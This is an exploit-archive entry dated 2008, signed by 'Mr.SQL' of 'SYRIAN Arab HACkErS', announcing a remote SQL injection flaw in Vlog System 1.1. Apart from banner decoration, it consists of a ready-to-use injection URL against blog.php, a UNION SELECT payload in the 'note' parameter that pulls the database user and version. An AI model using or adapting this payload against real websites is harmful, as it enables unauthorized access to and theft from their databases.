id: 4224
date: 11/22/2008
title: Vlog System 1.1 (blog.php user) Remote SQL Injection Vulnerability
author: Mr.SQL
cves: 

==================================================================
Vlog System 1.1 (blog.php user) Remote SQL Injection Vulnerability
==================================================================


###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL injection Vulnerability
##
## Vlog System V1.1 ( blog.php user )
##                            
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## SYRIAN Arab HACkErS
########################
########################
##
## -[[: Exploite :]]-
##
## www.Target.com/blog.php?user=<< REAL USER NAME HERE >>&note=906+AND+1=0+UNION+SELECT+1,2,Concat_Ws(0x3a,user(),@@version),4,5,6,7,8--
##
########################
########################

#######################################################################################################
#######################################################################################################



#  0day.today [2023-03-27]  #